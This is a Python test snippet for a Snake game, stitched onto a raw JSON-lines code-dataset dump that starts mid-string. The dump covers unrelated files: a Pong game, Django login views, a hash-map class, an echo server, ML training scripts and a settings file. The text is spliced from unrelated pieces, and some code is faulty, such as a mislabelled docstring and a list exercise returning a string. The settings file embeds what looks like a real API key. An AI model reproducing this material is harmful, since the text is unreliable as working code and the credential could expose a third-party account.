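# snake_entities: moving NORTH decreases y, turn_left from NORTH gives WEST,
# and grow() extends the body by one cell from the head.

from snake_entities import Snake, Point, Direction

snake = Snake(Point(5, 5), direction=Direction.NORTH, length=3)
assert snake.head == Point(5, 5) and snake.length == 3

snake.move()                       # NORTH offset is (0, -1)
assert snake.head == Point(5, 4)

snake.turn_left()                  # NORTH -> WEST
snake.move()
assert snake.head == Point(4, 4) and snake.direction is Direction.WEST

snake.grow()                       # appendleft of the next cell
assert snake.length == 4
print(snake.head, snake.length)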
Redoing file upload.\")\n\t\t\titerations += 1\n\t\t\tcontinue\n\n\t\treturn\n\traise ValueError\n\ndef compileResult(userID, didCompile, language):\n\t\"\"\"Posts the result of a compilation task\"\"\"\n\tr = requests.post(MANAGER_URL+\"compile\", data={\"apiKey\": API_KEY, \"userID\": userID, \"didCompile\": int(didCompile), \"language\": language})\n\ndef gameResult(width, height, users, replayPath):\n\t\"\"\"Posts the result of a game task\"\"\"\n\tr = requests.post(MANAGER_URL+\"game\", data={\"apiKey\": API_KEY, \"mapWidth\": str(width), \"mapHeight\": str(height), \"users\": json.dumps(users)}, files={os.path.basename(replayPath): open(replayPath, \"rb\").read()})\n","sub_path":"worker/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96220127","text":"#给出两个非空的链表用来表示两个非负的整数。\n# 其中,他们各自的位数是按照逆序的方式存储的,并且他们的节点只能存储一位数字。\n##如果,我们将两个数相加起来,则会返回一个新的链表来表示他们的和。\n#您可以假设除了数字0以外,这两个数都不会以0开头\nclass ListNode:\n def __init__(self,x):\n self.val=x\n self.next=None\nclass Solution:\n def addTwoNumbers(self,l1:ListNode,l2:ListNode)->ListNode:\n result1=\"\"\n while l1:\n result1=str(l1.val)+result1\n l1=l1.next\n \n result2=\"\"\n while l2:\n result2=str(l2.val)+result2\n l2=l2.next\n\n s=str(int(result1)+int(result2))\n return s","sub_path":"1906101045蓝昊杰/课后作业/第七次作业/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"87580535","text":"#!/usr/bin/env python3\n\nimport pickle\nimport operator\nimport os\nfrom pprint import pprint\n\nc_list = []\n\nfor f in os.listdir('.'):\n if not f.endswith('.pkl'):\n continue\n\n with open(f, 'rb') as fh:\n data = pickle.load(fh, encoding='utf-8')\n data = sorted(data.items(), key=operator.itemgetter(1), reverse=True)\n\n for i,k in enumerate(data):\n c_list.append(k)\n if i > 25:\n break\n\n\nw = set()\n\nfor item in c_list:\n if len(item[0].split()) > 1:\n print(item[0])\n","sub_path":"dir_pickle.py","file_name":"dir_pickle.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"370848736","text":"\nimport sys\n\nsys.path.append('/Users/choqueuse/Documents/codes/python/phasor_detection_TSP')\n\nimport numpy as np\nimport scipy as sc\nfrom numpy import linalg as lg\nfrom lib.triphase_detection import *\nfrom lib.comparison import *\nfrom lib.display import show_signals\nimport matplotlib.pyplot as plt\n\n\n\n#parameters\nloaded_parameter=np.load('parameters_npz.npz')\nFe=loaded_parameter['Fe'];\nf0=loaded_parameter['f0'];\nw_init=loaded_parameter['w_init'];\nN=80;\nSNR=loaded_parameter['SNR'];\nw=2*np.pi*f0/Fe\ncsv_on=1\nplot_on=1\n\ntype=\"balanced\"\n\nif type==\"balanced\":\n sym=np.matrix(np.array([0.0,0.0,1,1,0.0,0.0])).T\n filename_signal='../csv/sym_signal_balanced.csv'\n filename='../csv/sym_est_balanced.csv'\n\nif type==\"unbalanced\":\n sym=np.matrix(np.array([-0.5,0.2,1,1,-0.4,0.1])).T\n filename_signal='../csv/sym_signal_unbalanced.csv'\n filename='../csv/sym_est_unbalanced.csv'\n\n\n#Signal generation\nnum=(sym.T*sym)\nsigmaB=np.sqrt(np.trace(num/2)/(np.power(10,SNR/10.)))\nY=generate_Y_from_sym(sym,w,N,sigmaB)\n\nz_approx=compute_naive_sym_component(Y,w).A1\nz_est=estimate_sym_unbalanced(Y,w).A1\n\n\n#export csv file\nif csv_on==1:\n \n output_signal=np.bmat([sym.reshape((3, 2)),z_approx.reshape((3, 
2)),z_est.reshape((3, 2))])\n np.savetxt(filename, output_signal,header=\"symx,symy,z_approxx,z_approxy,px,py\", delimiter=\",\")\n \n print(output_signal)\n output_signal=np.array([np.arange(0,N),np.arange(0,N)/Fe,Y[0,:].A1,Y[1,:].A1,Y[2,:].A1])\n np.savetxt(filename_signal, output_signal.T,header=\"n,t,Phase 1,Phase 2,Phase 3\", delimiter=\",\")\n\n\n\nif plot_on==1:\n show_signals(Y)\n plt.show()\n\n\n","sub_path":"python/simulation2.py","file_name":"simulation2.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"19755290","text":"import os\n\nfrom decouple import config\n\n\nclass Config():\n \"\"\"\n Base configuration\n \"\"\"\n DEBUG = config('DEBUG') == 'True'\n HOST = config('HOST')\n PORT = config('PORT')\n APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory\n PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))\n\n DB_TYPE = config('DB_TYPE')\n DB_HOST = config('DB_HOST')\n DB_NAME = config('DB_NAME')\n DB_USER = config('DB_USER')\n DB_PASS = config('DB_PASS')\n DB_PORT = config('DB_PORT')\n\n SUCCESS = 'SUCCESS'\n CREATED = 'CREATED'\n RESOURCE_ERROR = 'RESOURCE_ERROR'\n PARAMETERS_ERROR = 'PARAMETERS_ERROR'\n SYSTEM_ERROR = 'SYSTEM_ERROR'\n DATA_NOT_FOUND = 'DATA_NOT_FOUND'\n\n STATUS_CODES = {\n SUCCESS: 200,\n CREATED: 201,\n DATA_NOT_FOUND: 204,\n RESOURCE_ERROR: 404,\n PARAMETERS_ERROR: 400,\n SYSTEM_ERROR: 500,\n }\n\n HTTP_STATUS_CODES = {\n 100: 'Continue',\n 101: 'Switching Protocols',\n 102: 'Processing',\n 200: 'OK',\n 201: 'Created',\n 202: 'Accepted',\n 203: 'Non Authoritative Information',\n 204: 'No Content',\n 205: 'Reset Content',\n 206: 'Partial Content',\n 207: 'Multi Status',\n 226: 'IM Used', # see RFC 3229\n 300: 'Multiple Choices',\n 301: 'Moved Permanently',\n 302: 'Found',\n 303: 'See Other',\n 304: 'Not Modified',\n 305: 'Use Proxy',\n 307: 'Temporary Redirect',\n 400: 'Bad Request',\n 401: 'Unauthorized',\n 402: 'Payment Required', # unused\n 403: 'Forbidden',\n 404: 'Not Found',\n 405: 'Method Not Allowed',\n 406: 'Not Acceptable',\n 407: 'Proxy Authentication Required',\n 408: 'Request Timeout',\n 409: 'Conflict',\n 410: 'Gone',\n 411: 'Length Required',\n 412: 'Precondition Failed',\n 413: 'Request Entity Too Large',\n 414: 'Request URI Too Long',\n 415: 'Unsupported Media Type',\n 416: 'Requested Range Not Satisfiable',\n 417: 'Expectation Failed',\n 418: 'I\\'m a teapot', # see RFC 2324\n 422: 'Unprocessable Entity',\n 423: 'Locked',\n 424: 'Failed Dependency',\n 426: 'Upgrade Required',\n 428: 'Precondition Required', # see RFC 6585\n 429: 'Too Many Requests',\n 431: 'Request Header Fields Too Large',\n 449: 'Retry With', # proprietary MS extension\n 451: 'Unavailable For Legal Reasons',\n 500: 'Internal Server Error',\n 501: 'Not Implemented',\n 502: 'Bad Gateway',\n 503: 'Service Unavailable',\n 504: 'Gateway Timeout',\n 505: 'HTTP Version Not Supported',\n 507: 'Insufficient Storage',\n 510: 'Not Extended'\n }\n\n TAX_CODE = [\n (1, \"Food & Beverage\"),\n (2, \"Tobacco\"),\n (3, \"Entertainment\"),\n ]\n\n TAX_CODE_IS_REFUNDABLE = {\n 1: 'Yes',\n 2: 'No',\n 3: 'No'\n }\n\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '[%(asctime)s][%(levelname)s] %(name)s '\n '%(filename)s:%(funcName)s:%(lineno)d | %(message)s',\n 'datefmt': '%H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 
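# The CSV export in the simulation above flattens each 6-element component
# vector into a (3, 2) block, one row per symmetrical component with (x, y)
# columns, and np.bmat stitches the blocks side by side. A minimal two-block
# illustration of that layout (the record uses three blocks):

import numpy as np

sym = np.arange(6.0).reshape(3, 2)   # stand-in for the "true" components
est = sym + 0.01                     # stand-in for an estimate
table = np.bmat([sym, est])          # shape (3, 4): x, y, x_hat, y_hat
print(table.shape)                   # (3, 4)
np.savetxt("sym_demo.csv", table, header="symx,symy,px,py", delimiter=",")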
'console'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'your_app': {\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n }\n\n @classmethod\n def serialize(cls, data):\n def structure_json(item):\n\n data_item = {\n \"id\": item[0],\n \"name\": item[1]\n }\n\n return data_item\n\n master = list(map(lambda item: structure_json(item), data))\n return master\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614182827","text":"# Importar modulos:\nimport pygame\nfrom pygame.locals import *\nimport os\nimport sys\nimport pygame._view\n\n# Definir variables globales (en mayusculas, por metodologia),\n# dimensiones de la pantalla y directorio de imagenes:\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\n# Directorios (carpetas):\nIMG_DIR = \"imagenes\"\nSONIDO_DIR = \"sonidos\"\n# Contadores de puntuacion (se inician en cero):\nPUNTOSJUGADOR1 = 0\nPUNTOSJUGADOR2 = 0\n\n# Cargar imagenes:\ndef load_image(nombre, dir_imagen, alpha=False):\n ruta = os.path.join(dir_imagen, nombre)\n try:\n image = pygame.image.load(ruta)\n except:\n print (\"No se pudo cargar la imagen:\", ruta)\n sys.exit(1)\n if alpha == True:\n image = image.convert_alpha()\n else:\n image = image.convert()\n return image\n# Cargar sonidos:\ndef load_sound (nombre, dir_sonido):\n ruta = os.path.join(dir_sonido, nombre)\n try:\n sonido = pygame.mixer.Sound(ruta)\n except pygame.error:\n print (\"No se pudo cargar el sonido:\", ruta)\n sonido = None\n return sonido\n\t\n# Crear Sprites (una clase por cada sprite):\n# Creamos la pelota:\nclass Pelota(pygame.sprite.Sprite):\n def __init__(self, sonido_golpe, sonido_punto1, sonido_punto2):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image(\"bola.png\", IMG_DIR, alpha=True)\n self.rect = self.image.get_rect()\n\t# Centrar bola:\n self.rect.centerx = SCREEN_WIDTH / 2\n self.rect.centery = SCREEN_HEIGHT / 2\n\t# Velocidad de la bola:\n self.speed = [3, 3]\n # Crear los sonidos:\n self.sonido_golpe = sonido_golpe\n self.sonido_punto1 = sonido_punto1\n self.sonido_punto2 = sonido_punto2\n # Hace avanzar la pelota y que rebote en los extremos:\n def update(self):\n # Puntos de los jugadores:\n global PUNTOSJUGADOR1, PUNTOSJUGADOR2\n # La pelota ha alcanzado el borde de la pantalla?\n if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH: \n self.speed[0] = -self.speed[0]\n # La pelota se movera en el sentido contrario al tocar un borde:\n if self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\n # A que velocidad mueve la pelota:\n self.rect.move_ip(self.speed[0], self.speed[1])\n # Cuando se reproducen los sonidos y se cuentan los puntos:\n if self.rect.left < 0:\n self.sonido_punto2.play()\n PUNTOSJUGADOR2 = PUNTOSJUGADOR2 + 1\n if self.rect.right > 640:\n self.sonido_punto1.play()\n PUNTOSJUGADOR1 = PUNTOSJUGADOR1 + 1\n # Colisiones:\n def colision(self, objetivo):\n if self.rect.colliderect(objetivo.rect):\n self.speed[0] = -self.speed[0]\n self.sonido_golpe.play()\n# Creamos las Paletas:\nclass Paleta(pygame.sprite.Sprite):\n def __init__(self, x):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image (\"paleta.png\", IMG_DIR, alpha=True)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = SCREEN_HEIGHT / 2\n # Definimos al Jugador Humano:\n def humano(self):\n # Que la paleta no se salga de 
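# Usage sketch for Config.serialize in the record above: it maps (id, name)
# pairs, such as the TAX_CODE tuples, into the {"id": ..., "name": ...} dicts
# an API layer would return. The function below mirrors that shape without the
# class plumbing so the sketch runs alone.

TAX_CODE = [(1, "Food & Beverage"), (2, "Tobacco"), (3, "Entertainment")]

def serialize(data):
    return [{"id": item[0], "name": item[1]} for item in data]

print(serialize(TAX_CODE))
# [{'id': 1, 'name': 'Food & Beverage'}, {'id': 2, 'name': 'Tobacco'},
#  {'id': 3, 'name': 'Entertainment'}]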
la pantalla:\n if self.rect.bottom >= SCREEN_HEIGHT:\n self.rect.bottom = SCREEN_HEIGHT\n elif self.rect.top <= 0:\n self.rect.top = 0\n # Definimos al Jugador CPU:\n def cpu(self, pelota):\n # La paleta se debe mover mas lento que la pelota (inferior a 3):\n self.speed = [0, 2]\n # La paleta solo se movera cuando la pelota cruce la mitad de la pantalla:\n if pelota.speed[0] >= 0 and pelota.rect.centerx >= SCREEN_WIDTH / 2:\n if self.rect.centery >= pelota.rect.centery:\n self.rect.centery -= self.speed[1]\n if self.rect.centery <= pelota.rect.centery:\n self.rect.centery += self.speed[1]\n\n# Jugador CPU invencible (sencillamente sigue el movimiento de la pelota):\n# def cpu(self, objetivo):\n# # Que la pala siga a la pelota:\n# self.rect.centery = objetivo.rect.centery\n# # Que la pala no se salga de la pantalla:\n# if self.rect.bottom >= SCREEN_HEIGHT:\n# self.rect.bottom = SCREEN_HEIGHT\n# elif self.rect.top <= 0:\n# self.rect.top = 0\n\n# Creamos el texto (para los puntos):\ndef render(texto):\n font = pygame.font.Font(\"lcd.ttf\", 40)\n texto_v= font.render(texto,1,(255,255,255))\n return texto_v\n\n# Definir la funcion principal del juego:\ndef main():\n # Iniciar modulo de Pygame:\n pygame.init()\n # Iniciar modulo del Mixer de Pygame (sonidos):\n pygame.mixer.init()\n # Iniciar modulo de Texto (puntos):\n pygame.font.init()\n \n # Dimensiones y nombre de la ventana:\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Oli Pong\")\n # Carga de elementos:\n fondo = load_image(\"fondo.jpg\", IMG_DIR, alpha=False)\n sonido_golpe = load_sound(\"coin.ogg\", SONIDO_DIR)\n sonido_punto1 = load_sound(\"aplausos.ogg\", SONIDO_DIR)\n sonido_punto2 = load_sound(\"losser.ogg\", SONIDO_DIR)\n bola = Pelota(sonido_golpe, sonido_punto1, sonido_punto2)\n \n # Crear y mostrar Jugador Humano (el numero es la separacion en pixeles de la pared):\n jugador1 = Paleta(40)\n # Crear y mostrar Jugador CPU:\n jugador2 = Paleta(SCREEN_WIDTH - 40)\n # Contador de tiempo:\n clock = pygame.time.Clock()\n # El movimiento se mantiene mientras se pulsa:\n pygame.key.set_repeat (1, 25)\n # Activar control con el raton sin puntero:\n pygame.mouse.set_visible(False)\n \t\n while True:\n\t# Frames por segundo maximos:\n clock.tick(60)\n\t# Registro de la posicion del raton:\n pos_mouse = pygame.mouse.get_pos()\n mov_mouse = pygame.mouse.get_rel()\n # Registro de elementos en movimiento:\n bola.update()\n jugador1.humano()\n jugador2.cpu(bola)\n # Comprobar si la pelota colisiona:\n bola.colision(jugador1)\n bola.colision(jugador2)\n\n # Bucle principal del juego:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # Se comprueban las acciones del jugador:\n elif event.type == pygame.KEYDOWN:\n if event.key == K_UP:\n jugador1.rect.centery -= 6\n elif event.key == K_DOWN:\n jugador1.rect.centery += 5\n elif event.key == K_ESCAPE:\n sys.exit(0)\n # Revision cuando se sueltan las teclas:\n elif event.type == pygame.KEYUP:\n if event.key == K_UP:\n jugador1.rect.centery += 0\n elif event.key == K_DOWN:\n jugador1.rect.centery += 0\n # Cuanto se ha movido el raton desde la ultima consulta que hizo a get_rel:\n elif mov_mouse[1] != 0 :\n jugador1.rect.centery = pos_mouse[1]\n\n # Actualizar los cambios en pantalla:\n screen.blit(fondo, (0, 0))\n # Cargar todos los elementos de 1 vez:\n todos = pygame.sprite.RenderPlain(bola, jugador1, jugador2)\n todos.draw(screen)\n \n# Cargar elementos 1x1:\n# screen.blit(bola.image, bola.rect)\n# 
screen.blit(jugador1.image, jugador1.rect)\n# screen.blit(jugador2.image, jugador2.rect)\n\n # Actualizar los cambios de puntuacion en pantalla:\n screen.blit(render(str(PUNTOSJUGADOR1)), (10,10))\n screen.blit(render(str(PUNTOSJUGADOR2)), (610,10))\n\n pygame.display.flip()\n\nif __name__== \"__main__\":\n main()\n","sub_path":"Oli_Pong/Oli_Pong.py","file_name":"Oli_Pong.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"413959542","text":"import pprint\nimport tensorflow as tf\nfrom model import MemN2N\nfrom data import *\n\npp = pprint.PrettyPrinter()\n\nflags = tf.compat.v1.app.flags\n\nflags.DEFINE_integer(\"edim\", 300, \"internal state dimension [300]\")\nflags.DEFINE_integer(\"lindim\", 300, \"linear part of the state [75]\")\nflags.DEFINE_integer(\"nhop\", 3, \"number of hops [3]\")\nflags.DEFINE_integer(\"batch_size\", 1, \"batch size to use during training [128]\")\nflags.DEFINE_integer(\"nepoch\", 300, \"number of epoch to use during training [100]\")\nflags.DEFINE_float(\"init_lr\", 0.01, \"initial learning rate [0.01]\")\nflags.DEFINE_float(\"init_hid\", 0.1, \"initial internal state value [0.1]\")\nflags.DEFINE_float(\"init_std\", 0.01, \"weight initialization std [0.05]\")\nflags.DEFINE_float(\"max_grad_norm\", 100, \"clip gradients to this norm [50]\")\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoints\", \"checkpoint directory [checkpoints]\")\nflags.DEFINE_string(\"pretrain_file\", \"baomoi.window2.vn.model.bin\", \"pre-trained [baomoi.window2.vn.model.bin]\")\nflags.DEFINE_string(\"train_data\", \"iphone_train.txt\", \"train gold data set path [.iphone_train.txt]\")\nflags.DEFINE_string(\"test_data\", \"iphone_test.txt\", \"test gold data set path [.iphone_train.txt]\")\nflags.DEFINE_boolean(\"show\", False, \"print progress [False]\")\n# flags.DEFINE_integer(\"pad_idx\", 0, \"pad_idx\")\n# flags.DEFINE_integer(\"nwords\", 1642, \"nwords\")\n# flags.DEFINE_integer(\"mem_size\", 134, \"mem_size\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n source_word2idx, target_word2idx, word_set = {}, {}, {}\n max_sent_len = -1\n\n max_sent_len = get_dataset_resources(FLAGS.train_data, source_word2idx, target_word2idx, word_set, max_sent_len)\n max_sent_len = get_dataset_resources(FLAGS.test_data, source_word2idx, target_word2idx, word_set, max_sent_len)\n\n train_data = get_dataset(FLAGS.train_data, source_word2idx, target_word2idx)\n test_data = get_dataset(FLAGS.test_data, source_word2idx, target_word2idx)\n\n # FLAGS.pad_idx = source_word2idx['']\n # FLAGS.nwords = len(source_word2idx)\n # FLAGS.mem_size = max_sent_len\n\n pp.pprint(flags.FLAGS.__flags)\n\n print('loading pre-trained word vectors...')\n print('loading pre-trained word vectors for train and test data')\n\n pre_trained_context_wt, pre_trained_target_wt = get_embedding_matrix(source_word2idx, target_word2idx, FLAGS.edim)\n\n with tf.compat.v1.Session() as sess:\n model = MemN2N(FLAGS, sess, pre_trained_context_wt, pre_trained_target_wt, source_word2idx[''],\n len(source_word2idx), max_sent_len, target_word2idx)\n model.build_model()\n model.run(train_data, test_data)\n\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"262771289","text":"class HashMap:\n\n # This function is the constructor & creates an empty hashmap with # 
of buckets that parameter passes in : O(n)\n    def __init__(self, buckets):\n        self.hashmap = []\n        for i in range(buckets):\n            self.hashmap.append([])\n\n    # This function creates the hash key needed for the hash table : O(1)\n    # Returns hashkey\n    def create_hashkey_from_id(self, key):\n        hashkey = int(key) - 1\n        return hashkey\n\n    # This function deletes a value from the hash table : O(1)\n    # Did not use for the project\n    # Returns boolean\n    def insert_into_hashtable(self, key, value):\n        hash_key = self.create_hashkey_from_id(key)\n        hash_pair = [hash_key, value]\n        self.hashmap[hash_key] = hash_pair\n\n    # This function deletes a value from the hash table : O(1)\n    # Did not use for the project\n    # Returns boolean\n    def delete_from_hashtable(self, key):\n        hash_key = self.create_hashkey_from_id(key)\n        # Empty buckets are stored as [], so test for emptiness rather than None\n        if not self.hashmap[hash_key]:\n            return False\n        # Buckets store [hash_key, value], so compare against the hashed key\n        if self.hashmap[hash_key][0] == hash_key:\n            self.hashmap[hash_key] = []\n            return True\n        return False\n\n    # This function looks up buckets in the hash table // for the prompt(user) : O(n)\n    # Prints package information for the user.\n    def lookup_in_hashtable(self, packageid, single_package):\n        hash_key = self.create_hashkey_from_id(packageid)\n        found = False\n        for bucket in self.hashmap:\n            # Skip buckets that were never filled\n            if bucket and bucket[0] == hash_key:\n                found = True\n                temp_package = bucket[1]\n                if single_package:\n                    package_info = (f'Package #{temp_package.package_id} is {temp_package.delivery_status}. Delivery address is {temp_package.address} '\n                                    f'{temp_package.city}, {temp_package.state} {temp_package.zip_code}. '\n                                    f'Package weight is {temp_package.weight}. Delivery deadline is {temp_package.delivery_deadline}.'\n                                    f' Delivered at {temp_package.delivery_time} AM.\\n')\n                if not single_package:\n                    package_info = (\n                        f'Delivery address is {temp_package.address} '\n                        f'{temp_package.city}, {temp_package.state} {temp_package.zip_code}. '\n                        f'Package weight is {temp_package.weight}. Delivery deadline is {temp_package.delivery_deadline}.')\n        if found:\n            print(package_info)\n        else:\n            print(f'Package #{packageid} does not exist.\\n')\n\n    # This function retrieves an object from the hash table : O(n)\n    # Returns an object stored in the hash table\n    def get(self, key):\n        hash_key = self.create_hashkey_from_id(key)\n        for pair in self.hashmap:\n            if pair and pair[0] == hash_key:\n                return pair[1]\n        return None\n","sub_path":"PackageHashTable.py","file_name":"PackageHashTable.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"490545780","text":"#settings.py\n\n\n\ndef init():\n    global startByte, exitSleep, sleep, APIKey, header_SCYTEC, url_SCYTEC\n    \n\n    \n    startByte=192 # 0b11000000\n    exitSleep=1\n    sleep=10\n    \n    ## ---- SCYTEC API PARAMETERS ---- ##\n    APIKey='yKVy0lXmHRCgm0DZemSNtb0G0PZbjyj86Si8S7/HROdH7oPXMlJ1FaRbPGaT8mP3\\\n            WaVfNOzqsNQxhF1F0hOtHQlGE0JH289w0bOFGLhoEj7IYBcQVgLl6hptez0C\\\n            08ALGA8hNACXyWj5J15lBMsKxIc4PfhfYnG5lCchUAdi397CBjv5it70Wtgg\\\n            nHIPTNarNipJtEmitfT3Wl2libLQH30sbUU88l2I1Jmx6NFSAFPsFQ4z85uR\\\n            qw=='\n    \n    header_SCYTEC={'Accept-Encoding':'gzip',\n                   'Content-type':'application/json;charset=utf-8',\n                   'APIKey':APIKey}\n    \n    url_SCYTEC='https://dx1.scytec.com/APIService/'","sub_path":"PythonScripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"575151189","text":"import re\nimport os\nimport codecs\n\nfrom setuptools import setup, find_packages\n\n\nrequirements =[\n    \"future >= 0.15.0, < 1\",\n    \"requests >= 2.5.2, < 3\",\n    \"six >= 1.3.0, < 2\",\n    \"websocket-client >= 0.32.0, < 1\",\n    \"PyYAML >=3, < 4\",\n    \"ago >=0.0.6, < 0.1\",\n    \"python-dateutil >= 2, <3\",\n    \"python-dockercloud >= 1.0.8, <2\",\n    \"tabulate >= 0.7, <1\"\n]\n\n\ndef read(*parts):\n    path = os.path.join(os.path.dirname(__file__), *parts)\n    with codecs.open(path, encoding='utf-8') as fobj:\n        return fobj.read()\n\n\ndef find_version(*file_paths):\n    version_file = read(*file_paths)\n    version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n                              version_file, re.M)\n    if version_match:\n        return version_match.group(1)\n    raise RuntimeError('Unable to find version string.')\n\nwith open('./test-requirements.txt') as test_reqs_txt:\n    test_requirements = [line for line in test_reqs_txt]\n\nsetup(\n    name='docker-cloud',\n    version=find_version('dockercloudcli', '__init__.py'),\n    packages=find_packages(),\n    install_requires=requirements,\n    tests_require=test_requirements,\n    entry_points={\n        'console_scripts':\n            ['docker-cloud = dockercloudcli.cli:main']\n    },\n    include_package_data=True,\n    author='Docker, Inc.',\n    author_email='info@docker.com',\n    description='CLI for Docker Cloud',\n    license='Apache v2',\n    keywords='docker cloud cli',\n    url='http://cloud.docker.com/',\n    test_suite='tests',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"455251323","text":"import socket  # the socket module provides the TCP listener (the io module has no socket API)\nimport threading\n\n\ndef handler(conn, addr):\n    message = conn.recv(1024)\n    # print(message)\n    conn.send(message)\n    conn.close()\n\n\ndef server(host, port):\n    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    listener.bind((host, port))\n    listener.listen(10)\n    print('server {} listen {}'.format(host, port))\n\n    while True:\n        conn, addr = 
listener.accept()\n        # print(addr, 'connected')\n        thread = threading.Thread(target=handler, args=(conn,addr))\n        thread.start()\n\n\ndef main():\n    host = '127.0.0.1'\n    port = 8877\n    server(host, port)\n\nif __name__ == '__main__':\n    main()\n    print('dsd')\n","sub_path":"server-multiThread.py","file_name":"server-multiThread.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"290379609","text":"from django.shortcuts import render_to_response\n\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\nfrom poster.models import Category\nfrom poster.models import Post\n\ndef one_post(request, idpost):\n    post = Post.objects.get(id=idpost)\n    \n    return render_to_response(\n        \"post.html\",\n        {\n            \"post\":post,\n        },\n    )\n\ndef home(request):\n    posts = Post.objects.order_by(\"-creation_date\")\n    \n    return render_to_response(\n        \"home.html\",\n        {\n            \"posts\":posts,\n        },\n    )\n\ndef posts_by_category(request, idcategory):\n    category = Category.objects.get(id=idcategory)\n    posts = category.post_set.order_by(\"-creation_date\")\n    \n    return render_to_response(\n        \"home.html\",\n        {\n            \"posts\":posts,\n        },\n    )\n\ndef nuevo_usuario(request):\n\n    if request.method=='POST':\n        formulario = UserCreationForm(request.POST)\n        # is_valid is a method; without the parentheses the check was always truthy\n        if formulario.is_valid():\n            formulario.save()\n            return HttpResponseRedirect('/')\n    else:\n        formulario = UserCreationForm()\n    return render_to_response('nuevousuario.html', {'formulario': formulario},\n                              context_instance=RequestContext(request))\n\ndef ingresar(request):\n    if not request.user.is_anonymous():\n        return HttpResponseRedirect('/privado')\n    if request.method == 'POST':\n        # Bind the POST data via data= (the first positional argument is the request)\n        formulario = AuthenticationForm(data=request.POST)\n        if formulario.is_valid():\n            usuario = request.POST['username']\n            clave = request.POST['password']\n            acceso = authenticate(username=usuario, password=clave)\n            if acceso is not None:\n                if acceso.is_active:\n                    login(request, acceso)\n                    return HttpResponseRedirect('/privado')\n                else:\n                    return render_to_response('noactivo.html', context_instance=RequestContext(request))\n            else:\n                return render_to_response('nousuario.html', context_instance=RequestContext(request))\n    else:\n        formulario = AuthenticationForm()\n    return render_to_response('ingresar.html',{'formulario':formulario}, context_instance=RequestContext(request))\n\n@login_required(login_url='/ingresar')\ndef privado(request):\n    usuario = request.user\n    return render_to_response('privado.html', {'usuario':usuario}, context_instance=RequestContext(request))\n\n@login_required(login_url='/ingresar')\ndef cerrar(request):\n    logout(request)\n    return HttpResponseRedirect('/')","sub_path":"poster/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"68849510","text":"import jinja2\nfrom werkzeug.wrappers import Request, Response\n\n\ndef render(template_path, context):\n    if template_path.endswith('/'):\n        template_path += 'index.html'\n\n    return jinja2.Environment(\n        loader=jinja2.FileSystemLoader('html/')\n    ).get_template(template_path).render(context)\n\n\n@Request.application\ndef application(request):\n    context = {\n        'get_data': 
request.args,\n        'post_data': request.data,\n    }\n    return Response(render(request.path, context), mimetype='text/html')\n\nif __name__ == '__main__':\n    from werkzeug.serving import run_simple\n    run_simple('localhost', 8080, application)\n","sub_path":"local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
